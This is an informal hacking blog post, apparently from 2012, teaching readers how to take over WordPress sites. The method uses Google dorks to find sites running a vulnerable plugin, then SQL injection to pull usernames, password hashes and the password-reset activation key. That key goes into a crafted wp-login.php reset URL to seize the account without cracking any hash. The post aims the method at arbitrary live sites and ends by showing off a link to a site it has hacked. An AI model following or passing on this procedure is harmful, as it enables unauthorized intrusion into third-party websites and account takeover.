Hacking Wordpress Without Hash Cracking

The title says am going to show u how to hack a wordpress site without cracking the hashes.Now this works with all the wordpress sqli exploits ever posted in any of its themes or plugins.
Point to remember: 
You cannot exploit the latest version of wordpress with this [3.4.2] which was released on 6th -september 2012 yea u heard it right released this month now there are still tons of websites out there which haven't been updated yet all the previous version can be exploited using this method ..
Things u need
1) any wordpress sqli dork .. (u can get it from exploit-db.com)
2) knowledge of sqli .. (coz this thread is not about sqli)
3) my help .. hehe

1) My Dork

There are number of sqli exploits in different plugins and themes of wordpress. The exploit im picking is in one of the plugins called Wp-FacebookConnect..
and the google dork for it is.

Now paste this code in google.com (one of my best frnds) and u will see no. of vulnerable websites.
2) Now the website im going to use here is

Here the parameter userid is vulnerable to sqli. So lets see what we can get from the data base.Im going to change the above URL with this :

Now u can see we got the username with the email id
Now if i change the above URL to this :

Im going to get the user name and the hashed password
Point to be noted here :  Im using concat here .. u can also use group_concat to get all the users again that would be ur knowledge how u use sqli.
Now we all know that wordpress hashes belong to the category MD5(wordpress)(different from simple MD5) and are very hard to crack but if ur mad u should think out of the box
So now follow the steps
a) Go to the login page of of wordpress site .. in my case that would be.
 b) Click on Lost your password ?
c) Now the wordpress will ask me for the username or email for which i want to reset the password in my case that is 'masaru' so go ahead and enter the username .

d) Now look closely it says "Check your e-mail for the confirmation link."
e) Now what wordpress does actually it sends an activation key to the email address of that user and it sets the value of activation key in the database aswell what u have to do is just to get that key .. 
f) So now im going to change my URL to this to get the activation key

And u can see we got the activation key here u should note it down somewhere.
g) Now finally all we have to do is without going to the email address reset the password for that im going to add this to my URL .
wp-login.php?action=rp&key=KEYHERE&login=USER NAME HERE

And im going to replace the KEYHERE with the activation key i got and the USERNAME HERE with the username which in my case is 'masaru' so my URL will be :

The wordpress will ask u for ur new password
Now go the login page again and try the new password and there u go u got access to the panel
Now to chk quickly if a website is using the latest version 3.4.2 or previous versions goto the login page and see if there is an option there to go back to the main page of the blog like in my case see the option : like in my case see the option : -- Back to Digital Way of Living then this is not 3.4.2 if u don't see this option .. then it is 3.4.2 this trick is not legit i figured it out and is working for me :
Hope you will like this .. : ) 
Hacked WordPress site : http://standzahra.id1945.com/


Post a Comment